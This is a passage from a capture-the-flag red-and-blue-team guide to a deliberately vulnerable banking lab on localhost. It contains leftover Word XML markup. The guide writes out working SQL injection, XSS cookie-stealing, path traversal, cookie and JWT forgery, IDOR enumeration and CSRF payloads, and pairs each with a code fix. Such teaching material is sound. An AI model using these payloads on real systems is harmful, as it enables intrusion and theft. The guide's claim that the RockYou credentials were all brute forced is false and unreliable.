        return jsonify({"error": "Account locked."}), 429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Automated tools like Hydra, Burp Suite, and custom scripts can try millions of combinations. Major breach at RockYou in 2009 exposed 32M credentials — all were brute forced.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VB4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Mass Assignment — Role Escalation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B — Bandra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Mass Assignment occurs when an API blindly accepts all fields from a request body and uses them to update a model. Attackers can modify fields they should not have access to — like role or balance.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Login as regular user and go to Profile tab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as priya / priya123.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Profile tab — you see fields: Email, Phone, Role, Balance, Credit Score.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"role" and "balance" fields should NOT be user-editable!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Change your role to admin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Role field, type: admin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Balance field, type: 9999999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"Update Profile".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 the updated fields in the response!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Direct API call for mass assignment:
curl -X PUT http://localhost:5002/api/profile \
  -H "Content-Type: application/json" \
  -b "token_b=YOUR_JWT" \
  -d '{"role":"admin","balance":9999999,"credit_score":900}'
# Response:
# {"success":true,"updated":{"role":"admin","balance":9999999,"credit_score":900}}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Use the new admin role to access admin panel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setting role=admin, go to Admin Panel tab.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"Load All Users" — now works!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balance also shows ₹99,99,999 — you have given yourself money!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Change your role from "customer" to "admin" via API. Also increase your balance to ₹99,99,999.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Use a whitelist of allowed fields in profile update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allow updating safe fields like email and phone.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accept role, balance, credit_score, or id from user input.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 — whitelist approach:
@app.route("/api/profile", methods=["PUT"])
def profile():
    s = get_session()
    if not s: return 401
    d  = request.get_json()
    # Only allow these safe fields:
    safe_fields = ["email", "phone"]
    updates = {k: d[k] for k in safe_fields if k in d}
    if updates:
        cols = ", ".join(f"{k}=?" for k in updates)
        db.execute(f"UPDATE users SET {cols} WHERE id=?", [*updates.values(), s["id"]])
        db.commit()
    return jsonify({"success": True})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 2012, GitHub was hacked via Mass Assignment — an attacker gave themselves admin access to any repo. Financial platforms with this bug allow users to give themselves unlimited money.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VB5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SQL Injection — Account Search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B — Bandra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injection in a search field allows an attacker to modify the WHERE clause to return all records or join with other tables — bypassing intended search logic.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Go to Search tab and test normal search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and go to Search tab.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for: Priya — you see Priya Nair's account.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API: GET /api/search?q=Priya uses the query in a LIKE clause with string concatenation.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Inject SQL to dump all accounts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search box, enter: ' OR '1'='1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Search.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5 accounts are returned — the LIKE condition is bypassed!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Normal query:
SELECT ... FROM users WHERE full_name LIKE '%Priya%'
# Injected query:
SELECT ... FROM users WHERE full_name LIKE '%' OR '1'='1%'
# '1'='1' is always TRUE → returns all rows!
# Also try:
' OR 1=1 --
%' OR '1'='1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Extract data from other tables via UNION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Search: ' UNION SELECT 1,2,3,4,5,6 --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columns until no error (6 columns in the safe SELECT).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Then extract data from any table.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Extract sqlite_master to see all tables:
' UNION SELECT name,sql,3,4,5,6 FROM sqlite_master WHERE type='table' --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with ' OR '1'='1 to get all 5 accounts. Admin account (BAC001) and their role should be visible.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Use parameterised queries in search route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search uses f-string concatenation. Replace with ? placeholder.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VULNERABLE:
results = db.execute(f"SELECT ... WHERE full_name LIKE '%{q}%'").fetchall()
# FIXED:
results = db.execute("SELECT ... WHERE full_name LIKE ? OR account_no LIKE ?", (f"%{q}%", f"%{q}%")).fetchall()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search box, filter, and sort field is a potential SQL injection vector. OWASP consistently lists SQLi as the most critical web application security risk.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VB6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Reflected XSS — Search Results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B — Bandra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Reflected XSS occurs when user input is immediately returned in the response and rendered as HTML. It requires tricking a victim into clicking a crafted URL, making it commonly used in phishing attacks.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Understand reflected XSS via search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search results page shows: "Results for: [your query]" using innerHTML.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query is reflected back from the server inside a dangerouslySetInnerHTML equivalent.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Unlike stored XSS, reflected XSS must be delivered via a crafted URL to a victim.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Submit XSS payload in search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search box, enter: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&lt;img src=x onerror=alert("XSS in Branch B!")&gt;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Search.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image fails to load, triggering onerror — alert pops up!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Reflected XSS payloads:
&lt;img src=x onerror=alert(document.cookie)&gt;
&lt;svg onload=alert(1)&gt;
&lt;iframe src="javascript:alert(1)"&gt;
# Craft a malicious URL to send to victim:
http://localhost:5002/search?q=&lt;img+src=x+onerror=alert(document.cookie)&gt;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Execute &lt;img src=x onerror=alert(document.cookie)&gt; in search. Alert shows session cookie. Craft a URL that delivers the XSS to another user.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Change innerHTML to textContent for search results display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JS code uses innerHTML to show the query in results.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it to use createTextNode or textContent.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VULNERABLE:
el.innerHTML = `Results for: &lt;strong&gt;${d.query}&lt;/strong&gt;`
// FIXED:
const span = document.createElement("span")
span.textContent = d.query  // safe — no HTML parsing
el.appendChild(document.createTextNode("Results for: "))
el.appendChild(span)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Sanitise the query server-side before reflecting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app.py search route, HTML-encode the query before returning it.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import html
return jsonify({"results": [...], "query": html.escape(q)})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Reflected XSS is used in targeted phishing campaigns. An attacker sends: "Click here to check your account: [malicious URL]" — victim clicks, script runs, cookie stolen.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VB7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Insecure File Access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B — Bandra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When a file server allows access to any filename without an allowlist, attackers can access internal configuration files, logs, and sensitive documents that were never meant to be public.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Go to Documents tab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and navigate to Documents tab.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see buttons: terms.txt, rates.txt, and internal_audit.txt 🔒.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API is: GET /api/docs/FILENAME — no check on which files are accessible!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Access the confidential audit file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"internal_audit.txt 🔒" button.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see the full contents: Admin Password, JWT Secret, DB path, server IP!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file should never be publicly accessible.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Content of internal_audit.txt:
INTERNAL AUDIT — CONFIDENTIAL
Admin Password: admin@bandra
JWT Secret: secret
DB: bank_b.db
Server: 192.168.1.51
Critical Vuln: JWT weak secret allows token forgery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Access /api/docs/internal_audit.txt to retrieve JWT secret ("secret"), admin password, and server IP.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Implement a whitelist of downloadable files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allow specific approved files, not any file in the directory.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FIXED:
ALLOWED_DOCS = {"terms.txt", "rates.txt"}  # whitelist
@app.route("/api/docs/&lt;filename&gt;")
def docs(filename):
    if not get_session(): return 401
    if filename not in ALLOWED_DOCS:
        return jsonify({"error": "File not available"}), 403
    path = os.path.join(DOCS, filename)
    return jsonify({"content": open(path).read()})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Move sensitive files outside accessible directories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store internal/sensitive files in the same folder as public docs.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Move internal_audit.txt to a separate secured location.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Exposes admin credentials, security secrets, and internal infrastructure details — enabling full system takeover.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VB8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Broken Access Control — Admin Panel via JWT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B — Bandra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Broken Access Control occurs when the application trusts unverifiable data (JWT claims) to make authorization decisions. Combined with a weak JWT secret, any user can grant themselves admin access.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Understand the access control model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panel routes (/api/admin/users) check: if session["role"] != "admin" → 403.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But "role" comes from the JWT token — which can be forged (V-B1)!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forging a JWT with role=admin, admin routes become accessible.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Combine with JWT forgery to access admin panel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the technique from B-V1: forge a JWT with role=admin using secret "secret".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token_b cookie with the forged token.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Admin Panel → Click "Load All Users" → Full database visible!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Combined attack chain:
# Step 1: Get your JWT from cookie token_b
# Step 2: Decode at jwt.io
# Step 3: Change payload: {"role":"admin"}
# Step 4: Sign with "secret"
# Step 5: Replace cookie
# Step 6: Access /api/admin/users
# Direct API test with forged token:
curl -H "Authorization: Bearer FORGED_TOKEN" http://localhost:5002/api/admin/users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Access /api/admin/users using a forged JWT with role=admin. Dump all user data including admin accounts.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Always verify permissions from database, not JWT claims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claims can be forged. The database is the source of truth.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every admin request, look up the actual role from DB.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FIXED:
def require_admin():
    s = get_session()
    if not s: return None
    db = get_db()
    user = db.execute("SELECT role FROM users WHERE id=?", (s["id"],)).fetchone()
    if not user or user["role"] != "admin": return None
    return s
@app.route("/api/admin/users")
def admin_users():
    if not require_admin():
        return jsonify({"error": "Forbidden"}), 403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Broken Access Control was the #1 OWASP security risk in 2021 and 2023. Any privilege escalation in banking = fraud, data theft, and regulatory action.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3B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="180"/>
              <w:left w:type="dxa" w:w="300"/>
              <w:bottom w:type="dxa" w:w="180"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr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Branch C — Colaba</w:t>
            </w:r>
          </w:p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22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Port 5003  ·  8 Vulnerabilities  ·  Beginner → Intermediate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VC1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Cookie Manipulation — Session Tampering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C — Colaba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When session data is stored client-side in plain Base64 (not encrypted or signed), any user can modify their own role, balance, or any other field and the server will trust the modified values.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Login and examine your session cookie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http://localhost:5003 and login with: kavya / kavya123.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DevTools → Application → Cookies → Find cookie: session_c.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value is Base64-encoded JSON — copy it.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Example session_c value:
eyJpZCI6MiwidXNlcm5hbWUiOiJrYXZ5YSIsImFjY291bnRfbm8iOiJDQUMwMDIiLCJyb2xlIjoiY3VzdG9tZXIiLCJiYWxhbmNlIjozODAwMH0=
# Decode it (in Python or at base64decode.org):
import base64
base64.b64decode("eyJpZC...").decode()
# → {"id":2,"username":"kavya","account_no":"CAC002","role":"customer","balance":38000}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Decode, modify, and re-encode the cookie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Copy the session_c cookie value.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https://www.base64decode.org → Decode → you see the JSON.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"role":"customer" to "role":"admin" and "balance":38000 to "balance":9999999.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https://www.base64encode.org → Encode the modified JSON.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Python method:
import base64, json
cookie = "eyJpZCI6Mi4uLn0="  # paste your cookie
decoded = json.loads(base64.b64decode(cookie + "=="))
print("Before:", decoded)
decoded["role"] = "admin"
decoded["balance"] = 9999999
new_cookie = base64.b64encode(json.dumps(decoded).encode()).decode()
print("New cookie:", new_cookie)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Replace cookie and verify changed role/balance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DevTools → Cookies → Double-click session_c → Paste new encoded value.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Refresh the page.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now shows: Role: admin, Balance: ₹99,99,999!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Change session cookie to set role=admin and balance=9999999. Dashboard shows updated values without any server-side validation.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Never store sensitive data in client-side cookies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cookie contains: id, role, balance — all on the client side.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can modify these. Server must not trust them!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 only a session ID in the cookie. Keep all data server-side.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VULNERABLE — stores role and balance in cookie:
session_data = {"id": user.id, "role": user.role, "balance": user.balance}
cookie = base64.b64encode(json.dumps(session_data).encode()).decode()
# FIXED — store only session ID:
session_id = secrets.token_hex(32)
SESSION_STORE[session_id] = {"user_id": user.id}  # server-side storage
cookie = session_id  # just an opaque ID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Use Flask's signed session cookie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Flask's built-in session cookie is cryptographically signed — any tampering invalidates it.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Flask session (session["user_id"] = ...) instead of manual cookies.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 a strong SECRET_KEY — without it the signature is worthless.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Use Flask session (already tamper-proof):
from flask import session
session["user_id"] = user["id"]  # only ID — role fetched from DB each time
# Flask signs this automatically with SECRET_KEY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Always fetch role and balance from database, not cookie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every request, look up the user's role and balance from the DB using their user_id.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trust balance or role from cookies.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Any customer can give themselves admin access or infinite balance. This is especially dangerous in e-commerce and banking applications.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VC2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IDOR — Loan Details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C — Colaba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Loan IDs are sequential integers (1, 2, 3, 4...). Without ownership verification, any authenticated user can view any loan by simply changing the ID in the URL.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Go to Loans tab and view your loan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as kavya / kavya123 and go to Loans tab.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see your own loan. The API is: GET /api/loan/1 (sequential IDs!).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 /api/loan/2, /api/loan/3, /api/loan/4 — all return loan details without ownership check!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Enumerate all loan IDs:
curl -b "session_c=YOUR_COOKIE" http://localhost:5003/api/loan/1
curl -b "session_c=YOUR_COOKIE" http://localhost:5003/api/loan/2
curl -b "session_c=YOUR_COOKIE" http://localhost:5003/api/loan/3
curl -b "session_c=YOUR_COOKIE" http://localhost:5003/api/loan/4  # Admin loan!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Access loan #4 — the admin's secret loan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"Loan #4" button in the Fetch panel.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Loan #4 belongs to Admin: Amount ₹9,99,999, Guarantor "N/A", Approved by "System".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Also reveals admin account details and guarantor information.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Access Loan #4 (Admin's loan) while logged in as kavya. See amount: ₹9,99,999 and guarantor details.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ownership check to loan route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loan belongs to the requesting user or user is admin.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FIXED:
@app.route("/api/loan/&lt;int:loan_id&gt;")
def loan(loan_id):
    s = get_session()
    if not s: return 401
    db = get_db()
    l  = db.execute("SELECT * FROM loans WHERE id=?", (loan_id,)).fetchone()
    if not l: return 404
    # Only allow own loan or admin:
    if l["account_no"] != s["account_no"] and s.get("role") != "admin":
        return jsonify({"error": "Access denied"}), 403
    return jsonify(dict(l))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Financial data of all loan holders exposed. Reveals: loan amounts, EMI, purpose, guarantor names — all sensitive PII and financial information.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VC3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Default Credentials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C — Colaba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Default credentials are the most trivially exploited vulnerability. Manufacturers and developers set default passwords that users forget to change — or that developers intentionally leave for "testing".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Try the most obvious default credentials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to http://localhost:5003.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Try: admin / admin — one of the most common default credentials.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succeeds immediately!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Common default credentials to try:
admin / admin
admin / admin123
admin / password
admin / nexusbank
manager / manager
manager / manager123
root / root
test / test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Notice the hint in page source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 source (Ctrl+U) of the login page.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Find: &lt;!-- Default creds: admin/admin | manager/manager123 --&gt;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Credential hints are also often found in README, docs, or version control history.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Login as admin and manager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/ admin → full admin access, all pages visible.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manager / manager123 → manager role account.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accounts have elevated privileges — expose all customer data.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Login as admin using admin/admin. Check page source to find the HTML comment with credentials.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Remove all default credentials before deployment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hardcoded admin/admin and manager/manager123 from init_db().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first startup, force admin to create a new secure password.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a setup wizard that requires strong password creation before the app is usable.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In init_db() — remove default admin:
# DO NOT create admin with default password:
# db.execute("INSERT INTO users ... VALUES ('admin','admin'...)")
# Instead: check if any admin exists, if not force creation via CLI or setup page.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Remove credential hints from HTML source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the HTML comment: &lt;!-- Default creds: admin/admin | manager/manager123 --&gt;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all HTML templates for TODO, admin, password, creds keywords.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Mirai botnet (2016) compromised 600,000+ IoT devices using only default credentials, causing the largest DDoS attack in history. Default creds are always the first thing attackers try.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VC4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API Enumeration — Support Tickets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C — Colaba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Beginner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 Enumeration (also called IDOR) involves iterating through predictable object IDs to access data belonging to other users. Sequential integers (1, 2, 3...) make this trivial.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Go to Support Tickets tab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and go to Support tab.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see options to fetch tickets by ID.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API is: GET /api/ticket/{id} — sequential IDs, no ownership check.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Enumerate all ticket IDs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#1, #2, #3, #4, #5 buttons in order.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#1: kavya's ATM issue — "My ATM card is not working at Branch C ATM"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#2: suresh's complaint — "My balance seems incorrect"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Private customer complaints exposed to any logged-in user!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Script to enumerate all tickets:
for i in $(seq 1 20); do
  result=$(curl -s -b "session_c=YOUR_COOKIE" http://localhost:5003/api/ticket/$i)
  if echo "$result" | grep -q "account_no"; then
    echo "Ticket #$i found:"
    echo "$result" | python3 -m json.tool
  fi
done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 all support tickets #1 through #5. Find kavya's private ATM complaint and suresh's balance discrepancy report.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ownership check and use non-sequential IDs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that ticket's account_no matches session user (or is admin).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UUIDs or hashed IDs instead of sequential integers to prevent enumeration.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FIXED:
import uuid
# Use UUID as ticket ID:
ticket_id = str(uuid.uuid4())  # e.g. "f47ac10b-58cc-4372-a567-0e02b2c3d479"
# Ownership check in route:
@app.route("/api/ticket/&lt;ticket_id&gt;")
def ticket(ticket_id):
    s = get_session()
    if not s: return 401
    db = get_db()
    t  = db.execute("SELECT * FROM tickets WHERE id=?", (ticket_id,)).fetchone()
    if not t: return 404
    if t["account_no"] != s["account_no"] and s.get("role") != "admin":
        return jsonify({"error": "Access denied"}), 403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Customer private communications exposed. In healthcare: patient records. In law: case files. In banking: complaint details that reveal security vulnerabilities to other attackers.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VC5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SQL Injection — Profile Update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C — Colaba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injection in an UPDATE statement can modify data for all rows in a table — not just the attacker's own record. This can corrupt or overwrite other users' data.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Go to Profile page and examine the update feature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and go to Profile tab.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form updates email, phone, nominee via POST /api/profile/update.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three fields are inserted into a raw SQL UPDATE query without sanitisation.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The vulnerable query in app.py:
query = f"UPDATE users SET email='{email}', phone='{phone}', nominee='{nominee}' WHERE id={session_id}"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Inject SQL in the nominee field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Nominee field, enter: HACKED', email='hacked@evil.com' WHERE 1=1 --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 email and phone to normal values.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Update Profile.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Nominee field input:
HACKED', email='hacked@evil.com' WHERE 1=1 --
# Resulting SQL:
# UPDATE users SET email='normal@email.com', phone='1234', nominee='HACKED',
#   email='hacked@evil.com' WHERE 1=1 --' WHERE id=2
# This updates ALL users' emails to hacked@evil.com!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Observe SQL error to confirm injection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Try: ' in any field — the raw SQL error is returned in the response.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error reveals the exact query structure.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errors in production = significant information disclosure.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Inject SQL that sets all users' emails to hacked@evil.com using the nominee field. Verify by checking another user's profile.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Use parameterised queries in profile update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f-string SQL with parameterised placeholders.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VULNERABLE:
query = f"UPDATE users SET email='{email}', phone='{phone}', nominee='{nominee}' WHERE id={sid}"
# FIXED:
db.execute("UPDATE users SET email=?, phone=?, nominee=? WHERE id=?", (email, phone, nominee, session["user_id"]))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Never expose SQL errors to users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the except block that returns str(e).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a generic "Update failed" message instead.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manipulation SQLi can corrupt entire databases. Unlike SELECT-based SQLi, UPDATE/DELETE SQLi causes permanent data loss — potentially unrecoverable.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VC6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DOM-Based XSS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C — Colaba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DOM-Based XSS occurs when JavaScript writes user-controlled data to the DOM using innerHTML or similar methods. The malicious payload never reaches the server — it executes purely in the browser.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Understand DOM XSS in profile update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profile update succeeds or fails, the response is rendered using innerHTML.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Unlike reflected XSS (which comes from server), DOM XSS happens entirely in the browser.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error message contains HTML, it executes!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Trigger DOM XSS via field input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nominee field, enter: &lt;img src=x onerror=alert("DOM XSS!")&gt;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Update Profile.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the browser renders the input in the result area via innerHTML — alert fires!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DOM XSS payloads for profile fields:
&lt;img src=x onerror=alert(document.cookie)&gt;
&lt;svg/onload=alert(1)&gt;
&lt;body onload=alert(1)&gt;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Execute &lt;img src=x onerror=alert(document.cookie)&gt; through any profile field rendered via innerHTML.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Use textContent instead of innerHTML everywhere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all JavaScript for innerHTML and replace with textContent.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render API responses as HTML.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VULNERABLE:
msgDiv.innerHTML = `&lt;div class="alert"&gt;${d.error}&lt;/div&gt;`
// FIXED:
msgDiv.textContent = d.error  // plain text only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 XSS is harder to detect than reflected XSS — it doesn't appear in server logs. Can be used for the same attacks: session theft, phishing, keylogging.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VC7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Path Traversal — Document Download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C — Colaba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Same class of vulnerability as A-V7 but in Branch C. Path traversal using ../ sequences lets attackers read any file the web server has permission to access.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Go to Documents tab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and navigate to Documents tab.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usage: click "loan_guide.txt" or "interest_chart.txt".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API: GET /api/document?name=FILENAME — path not sanitised!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Traverse outside documents directory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the "../server_config.txt ⚠" button.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server resolves: /branch-c/documents/../server_config.txt = /branch-c/server_config.txt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see: ADMIN_PASS, DB path, server IP — full server configuration!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Traversal payloads:
../server_config.txt       → /branch-c/server_config.txt
../../branch-a/secret.txt  → another branch's secrets!
../app.py                  → full source code
../bank_c.db               → SQLite database file!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Read the app.py source code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Enter: ../app.py in the document input.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server source code is returned — all routes, vulnerabilities, and business logic visible.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gives complete roadmap for exploiting all other vulnerabilities!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 ../server_config.txt to get ADMIN_PASS and server IP. Read ../app.py for full source code.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Sanitise path and restrict to documents directory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os.path.basename() to strip directory components.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final path is inside DOCS directory using realpath comparison.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FIXED:
@app.route("/api/document")
def document():
    if "user_id" not in session: return 401
    name = request.args.get("name", "")
    # Strip directory traversal:
    safe_name = os.path.basename(name)
    path      = os.path.join(DOCS, safe_name)
    # Verify it stays inside DOCS:
    if not os.path.realpath(path).startswith(os.path.realpath(DOCS)):
        return jsonify({"error": "Access denied"}), 403
    try:
        return jsonify({"content": open(path).read()})
    except:
        return jsonify({"error": "File not found"}), 404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Source code exposure reveals all vulnerabilities. Config file exposure reveals credentials. Together = complete system compromise.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VC8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CSRF — Profile/Nominee Update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[ Branch C — Colaba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E3A6E" w:sz="1"/>
          <w:left w:val="single" w:color="1E3A6E" w:sz="12"/>
          <w:bottom w:val="single" w:color="1E3A6E" w:sz="1"/>
          <w:right w:val="single" w:color="1E3A6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E4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">📖 WHAT IS THIS VULNERABILITY?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CSRF on profile/nominee update allows an attacker to silently change a victim's nominee (person who inherits the account). This is a high-impact attack in banking — changing nominee can redirect inheritance of funds.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🔴  RED TEAM — ATTACK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Understand the nominee update endpoint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endpoint POST /api/profile/nominee updates nominee name and email.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checks for valid session — but has no CSRF token!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website can trigger this while the user is logged in.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Simulate CSRF attack using browser console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Stay logged in to Branch C.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browser console (F12) — this simulates what a malicious website would do.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Paste and run the CSRF payload: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CSRF attack (paste in browser console while logged in to Branch C):
fetch("http://localhost:5003/api/profile/nominee", {
  method: "POST",
  headers: {"Content-Type": "application/json"},
  credentials: "include",  // sends session_c cookie!
  body: JSON.stringify({
    nominee: "HACKED BY CSRF",
    email: "hacker@evil.com"
  })
}).then(r=&gt;r.json()).then(d=&gt;alert("CSRF Result: "+JSON.stringify(d)))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Use the "Simulate CSRF Attack" button on Profile page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Branch C Profile page has a "Simulate CSRF Attack" button for demo.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none" w:color="FFFFFF" w:sz="0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it — it sends a fake cross-origin request that updates your nominee.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B91C1C" w:sz="1"/>
              <w:bottom w:val="single" w:color="B91C1C" w:sz="1"/>
              <w:right w:val="single" w:color="B91C1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B91C1C" w:sz="1"/>
              <w:right w:val="single" w:color="B91C1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Refresh profile — nominee changed to "HACKED BY CSRF"!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🚩 EXPECTED RESULT / FLAG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Change your own nominee to "HACKED BY CSRF" using the browser console CSRF simulation without clicking any button on the actual banking page.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4"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔵  BLUE TEAM — DEFENCE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66534" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0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Add CSRF token to all state-changing endpoints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none" w:color="FFFFFF" w:sz="0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1D9E6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CSRF token on login. Include it in every POST/PUT/DELETE.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166534" w:sz="1"/>
              <w:bottom w:val="single" w:color="166534" w:sz="1"/>
              <w:right w:val="single" w:color="166534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166534" w:sz="1"/>
              <w:right w:val="single" w:color="166534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Validate the token server-side before processing.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8" w:sz="1"/>
              <w:left w:val="single" w:color="7EC8A0" w:sz="16"/>
              <w:bottom w:val="single" w:color="2D3F58" w:sz="1"/>
              <w:right w:val="single" w:color="2D3F58" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A253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Generate on login:
session["csrf_token"] = secrets.token_hex(32)
# Validate on every state change:
def check_csrf():
    d = request.get_json() or {}
    token = d.get("csrf_token") or request.headers.get("X-CSRF-Token")
    return token == session.get("csrf_token")
@app.route("/api/profile/nominee", methods=["POST"])
def profile_nominee():
    if "user_id" not in session: return 401
    if not check_csrf():
        return jsonify({"error": "CSRF token invalid"}), 403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2410C" w:sz="1"/>
          <w:left w:val="single" w:color="C2410C" w:sz="12"/>
          <w:bottom w:val="single" w:color="C2410C" w:sz="1"/>
          <w:right w:val="single" w:color="C2410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⚠️  REAL-WORLD IMPACT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before="0" w:after="1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Silently changing bank account nominee is a fraud tactic. Attacker makes themselves or a mule account the nominee — in case of account holder death, funds go to attacker. SEBI and RBI mandate CSRF protection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D9E6" w:sz="6" w:space="1"/>
        </w:pBd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D1D9E6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000"/>
      <w:gridCol w:w="47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120" w:line="276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B5563"/>
              <w:sz w:val="16"/>
              <w:szCs w:val="16"/>
            </w:rPr>
            <w:t xml:space="preserve">Branch A: 5001  ·  Branch B: 5002  ·  Branch C: 5003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4B5563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sz w:val="16"/>
              <w:szCs w:val="16"/>
            </w:rPr>
            <w:t xml:space="preserve">— CTF Guide —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 w:color="FFFFFF" w:sz="0"/>
        <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
        <w:bottom w:val="single" w:color="B8962E" w:sz="4"/>
        <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
        <w:insideH w:val="single" w:color="auto" w:sz="4"/>
        <w:insideV w:val="single" w:color="auto" w:sz="4"/>
      </w:tblBorders>
    </w:tblPr>
    <w:tblGrid>
      <w:gridCol w:w="5000"/>
      <w:gridCol w:w="47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120" w:line="276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C2E4A"/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
            <w:t xml:space="preserve">NexusBank CTF — Red &amp; Blue Team Guide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120" w:line="276"/>
            <w:jc w:val="righ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sz w:val="16"/>
              <w:szCs w:val="16"/>
            </w:rPr>
            <w:t xml:space="preserve">Confidential — CTF Use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C2E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2026-03-07T05:19:31.363Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-07T05:19:31.364Z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